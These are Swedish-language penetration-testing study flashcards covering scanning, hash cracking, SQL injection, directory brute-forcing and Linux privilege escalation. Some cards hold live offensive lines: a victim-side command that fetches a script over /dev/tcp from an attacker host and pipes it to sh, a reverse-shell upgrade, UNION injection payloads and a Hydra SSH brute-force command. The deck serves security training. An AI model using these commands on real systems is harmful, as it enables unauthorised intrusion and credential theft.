Penetrationstestning Flashcards

1
Q

Vilket protokoll måste alltid en host svara på?

A

ARP (Dock endast på lokala subnätet)

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
2
Q

Vilka portar skannar Nmap med följande kommando?

Nmap 10.0.0.1

A

De 1000 VANLIGASTE portarna.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
3
Q

Vilken option ska du använda med Nmap för att skanna alla portar?

A

-p-

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
4
Q

Vad betyder optionerna -sV och -sC i nmap?

A

Optionen -sV är “Version detection” d.v.s Banner
grabbing.

Exempelvis följande:22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8

Optionen -sC är script d.v.s kör anpassade script mot hosten för att få ut mer info. Används exempelvis för att hitta sårbarheter eller möjligheter att logga in anonymt utan lösenord på en tjänst.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
5
Q

Default så scannar nmap endast tcp-portar. Hur gör du för att scanna udp-portar?

A

Använd optionen -sU. Denna tar dock lång tid och scannar de 1000 vanligaste portarna.

Att scanna alla portar på en host tar mycket lång tid. Att scanna ett helt nät tar ännu längre tid.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
6
Q

Vilket kommando ger dig en snabb överblik över dina rättigheter i /etc/sudoers?

A

sudo -l

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
7
Q

Vilken av följande binärfiler är möjlig att utnyttja för privilege escalation?

/usr/bin/chfn
/usr/bin/newgidmap
/usr/bin/newgrp
/usr/bin/cp

A

/usr/bin/cp

Tips är GTFOBins för att kolla detta.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
8
Q

I /etc/shadow-filen hittar du ett hastat lösenord som börjar med $1$.

Vilken form av hash är detta?

A

En MD5-hash (unix).

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
9
Q

I /etc/shadow-filen hittar du följande hash:
$1$h6k3X5db$pp8WQ5R5YYL5bNyQj2wP70

Förklara vad de olika fälten separerade med dollartecken indikerar.

A

$id$salt$krypteradtext

id är den formen av hash det är.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
10
Q

I /etc/shadow-filen hittar du ett hastat lösenord som börjar med $6$.

Vilken form av hash är detta?

A

En SHA512-hash.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
11
Q

Hashcat är ett verktyg för att räkna ut hashar. Vad indikerar -m 0 i följande kommando?

hashcat -m 0 -a 0 hashar.txt /usr/share/wordlists/rockyou.txt

A

-m 0 anger vilken typ av hash vi crackar. I detta fallet en md5-hash.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
12
Q

Hashcat är ett verktyg för att räkna ut hashar. Vad indikerar -a 0 i följande kommando?

hashcat -m 0 -a 0 hashar.txt /usr/share/wordlists/rockyou.txt

A

Detta indikerar att det är en dictionary attack, eller “straight mode”.

Hashcat räknar här endast ut hasharna av orden i ordlistan och jämför med dina hashar i filen ”hashar.txt”. Detta är en metod som går snabbt även med en lång lista som rockyou.txt.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
13
Q

Hashcat kan användas för att genomföra en s.k. Mask Attack.

Hur fungerar detta?

A

Provar alla kombinationer från ett givet utrymme precis som i en Brute-Force-attack, men mer specifikt. Detta sparar tid om vi vet något om lösenordet, exempelvis att det endast innehåller siffror.

Exempel:
?d = 0123456789, indikerar på att endast siffror ska användas på den angivna positionen.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
14
Q

Du ska genomföra en Mask-attack med Hashcat.

Vad är de olika charsetsen kan du använda och vad betyder dessa?

A
?l = abcdefghijklmnopqrstuvwxyz
?u = ABCDEFGHIJKLMNOPQRSTUVWXYZ
?d = 0123456789
?h = 0123456789abcdef
?H = 0123456789ABCDEF
?s = «space»!"#$%&'()*+,-./:;<=>?@[\]^_`{|}~ 
?a = ?l?u?d?s
?b = 0x00 - 0xff
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
15
Q

En fil som vanligtvis går att hitta på en domän är filen robots.txt. Vad innehåller denna?

A

Robots Exclusion-protokollet är ett sätt att be crawlers och andra robotar som samlar information åt söktjänster på internet att inte besöka vissa delar av en webbplats.

Detta kan vara en intressant fil att kolla närmare på för att hitta ytterligare directories på webbplatsen.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
16
Q

Vad används ”UNION” till i en SQL-injektion?

A

UNION används för att lägga till förfrågningar till vår SQL-injektions legitima fråga och kombinera informationen vi vill hämta med den tillsammans med den legitima frågan.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
17
Q

Vad används följande rad till i en SQL-injektion?

UNION ALLSELECT NULL,concat(TABLE_NAME) FROM information_schema.TABLES WHERE table_schema=’jimmysdatabas’–

A

Hämta alla tabellnamn i databasen ”jimmysdatabas”.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
18
Q

Du vill hämta data från en annan databas med hjälp av ”UNION”. Hur ska du gå till väga?

A

UNION ALLSELECT NULL,concat(kolumn1,kolumn2) FROM jimmysdatabas2.mariostabell–

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
19
Q

Du ska genomföra Privilege Escalation med LinPEAS.sh. Hur går du till väga för att använda det på en maskin du saknar lösenord till?

A

Du kan exempelvis genomföra följande i en katalog du alltid har skriv- och läsrättigheter i. Exempelvis /tmp.

sudo nc -q 5 -lvnp 80 < linpeas.sh #Host
cat < /dev/tcp/10.192.128.xx/80 | sh #Victim

20
Q

Du har efter mycket slit lyckats få ett Reverse Shell via netcat. Nu vill du slippa ångesten över att vara nervös över att (av ren vana) avbryta en process med ”Ctrl-C” och råka avbryta hela anslutningen.

Du vet att det finns python3 på maskinen. Vad gör du?

A

python -c ‘import pty; pty.spawn(“/bin/bash”)’

21
Q

Vad är SQLmap?

A

Sqlmap är ett open source -penetrationstestverktyg som automatiserar processen av att upptäcka och utnyttja SQL-injektionsfel och ta över databasservrar.

22
Q

Du har följande kommando. Vad indikerar level och risk i detta fallet?

sqlmap -r filen.txt –level 5 –risk 3

A

Risk:
Standardvärdet är 1, vilket är ofarligt för de flesta SQL -injektionspunkter. Riskvärde 2 lägger till tester för tunga tidsbaserade SQL-injektioner. Värde 3 lägger till OR-baserade SQL-injektionstester.

Level:
Level 5 är den mest djupgående nivån och kommer att testa för ett mycket större antal payloads och boundaries. Detta tar dock mycket längre tid.

23
Q

Du har följande URL du tror är sårbar för en SQL-injektion. Hur löser du detta med sqlmap?

http://marioparada.eu/vuln/test.php?luckynumber=3

A

Exempelvis:

sqlmap -u ”http://marioparada.eu/vuln/test.php?luckynumber=3” –level 5 –risk 3

24
Q

Hur listar du information om de befintliga databaserna med sqlmap?

A

Lägg till –dbs i slutet för att lista databaser.

25
Q

Vad gör kommandot ”ps aux”?

A

Ger dig en överblick över vilka processer som körs och låter dig kontrollera om någon process har fler privilegier än den borde (kanske en process körs som “root” som inte borde göra det?)

26
Q

Vad är GTFOBins?

A

GTFOBins är en lista över Unix-binärer som kan användas för att kringgå säkerhetsrestriktioner i felkonfigurerade maskiner.

https://gtfobins.github.io

27
Q

Hur gör du för att köra kommandot ”whoami” med en annan användares miljö?

A

sudo -i -u användare whoami

28
Q

Vad gör ”netstat -tulpn” ?

A

Möjliggör det för dig att få en överblick av vilka portar som är öppna och vilka tjänster som använder dessa för tillfället.

Betydelse:
netstat –tcp –udp –listening –program —numeric

29
Q

Hur gör du för att visa HTTP request headers när du ska curla till en webbsida?

A

Curls -v eller –verbose option visar detta för dig på skärmen.

30
Q

Metasploit är ett lättanvänt verktyg för att använda kända sårbarheter. Vad betyder LHOST ?

A

Detta är din adress. Du ställer in detta med ”set LHOST xxx.xxx.xxx.xxx”.

Använder du en VPN så räcker det oftast med att skriva ”set LHOST tun0”, förutsatt att din VPN-anslutning använder tun0-interfacet.

31
Q

När du har valt en sårbarhet i Metasploit-konsollen finns där en förvald payload som är den troligaste att fungera. Hur gör du för att ändra payload?

A

Du kan skriva ”show payloads” för att lista alla payloads med id-nummer. Då får du upp en lista över alla payloads du kan använda. Skriv sedan ”set payload id-nummer” för att välja en annan payload, alternativt hela namnet på payloden likt följande ”set payload bla/meterpreter/reverse_python2”.

32
Q

Var i Kali kan du enkelt finna webshells?

A

/usr/share/webshells/

33
Q

Verktyget “john the ripper” kan användas för att räkna ut hashar och därmed räkna ut lösenord. Hur använder du detta verktyg för att räkna ut lm-hashar med rockyou.txt från filen lmhashar.txt?

A

john lmhashar.txt –format=LM —wordlist=/usr/share/wordlists/rockyou.txt

34
Q

Du har kommit över inloggningsuppgifter till en msql-databas på den lokala servern du är ansluten till. Vilket kommando skriver du för att välja alla rader och kolumner från tabellen ”jimmystabell” ?

A

SELECT * FROM jimmystabell

35
Q

Du har hittar en tjänst på en maskin och vill kolla upp om det finns några kända sårbarheter för denna tjänsten med searchsploit. Du läser på nätet att det nu finns ny känd exploit med ett CVE ID men du hittar inte denna när du söker efter denna med searchsploit.

Vad kan vara anledningen?

A

Du har inte uppdaterat databasen.

searchsploit -u

36
Q

Du har hittat en exploit med searchsploit som du skulle vilja använda. Hur gör du för att kopiera till katalogen du står i?

A

Med -m optionen (mirror). Exempelvis:

searchsploit -m /path/till/exploit/34564.py

37
Q

Du har hittat en intressant sida du kan logga in på. Du vet att användarnamnet är ”admin” och du har en lösenordslista du vill använda med intrudern i BurpSuite för att försöka logga in. Det går dock riktigt långsamt för att du inte har betalversionen.

Hur gör du?

A

Använd tillägget ”Turbointruder” och använd ett basic script där du byter ut sökvägen till din ordlista i scriptet och placerar ”%s” på positionen där du vill placera lösenorden i requesten.

38
Q

Du använder Turbointruder i BurpSuite för att försöka logga in via ett formulär. Du har en lista med användarnamn och en med lösenord.

Hur gör du för att lösa detta enkelt?

A

Välj det färdiga scriptet ”multiple parameters” i rullgardinen och placera ”%s” på både positionen för användarnamn och lösenord i requesten. Byt ut ordlistorna till adminlistan och lösenordslistan på rätt positioner i scriptet.

39
Q

Du ska använda verktyget Gobuster för att hitta nya directories på en domän. Vilken seclists-ordlista är lämplig för detta?

A

Någon av följande listor är bra att använda:

/usr/share/SecLists/Discovery/Web-Content/raft-large-directories.txt
/usr/share/SecLists/Discovery/Web-Content/raft-medium-directories.txt
/usr/share/SecLists/Discovery/Web-Content/raft-smal-directories.txt

40
Q

Du vill använda gobuster till att hitta en fil i en directory på domänen hemsida.se. Du använder ordlistan filer.txt och vill hitta .php och .html filer.

Hur ser syntaxen ut?

A

gobuster dir -u http://hemsida.se/path/till/ -w filer.txt -x .php,.html

41
Q

Vilket tillägg i gobuster använder du för att använda fler trådar?

A

-t

Exempelvis: -t 10

42
Q

Hur använder du gobuster för att hitta subdomänder?

A

Exempelvis med ”dns Mode”.

gobuster dns -d mario.microsoft -w common-names.txt

43
Q

Vad är hydra?

A

Hydra är en parallelliserad inloggningsknäckare som stöder många olika protokoll.

44
Q

Du hittar en maskin där du kan logga in med ssh. Du vet inget om maskinen förutom att användarnamnet är nisse42.

Hur löser du detta med hydra?

A

Det gör du inte. Du använder Axels mycket smidiga script hydran.
Länk: https://github.com/bebbenn/hydran

Alternativt: hydra -l nisse42 -P /usr/share/wordlists/vanligalösenord.txt ssh://192.168.0.1

Hydra har även stöd för bl.a. rdp, smb, telnet m.m.

45
Q

Du befinner dig i en situation där du har möjlighet att ladda upp ett Reverse Shell i en oneliner. Hur går du till väga för att hitta något lämpligt Reverse Shell?

A

Använd Felix Lineplease.

”Lineplease is a helper script (bash) designed to simplify the process of grabbing reverse shell oneliners from the web and changing them to fit whatever need. ”

Länk: https://github.com/rub3rth/lineplease

Alternativt använd PayloadsAllTheThings Reverse Shell Cheat Sheet och modifiera själv ip och port.

46
Q

Du vill använda verktyget WFUZZ till att hitta subdomäner till adressen silenta.se med listan subdomains-top1million-110000.txt.

Hur ser syntaxen ut?

A

wfuzz -c -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -p 10.0.0.3:80:HTTP -u http://FUZZ.silenta.se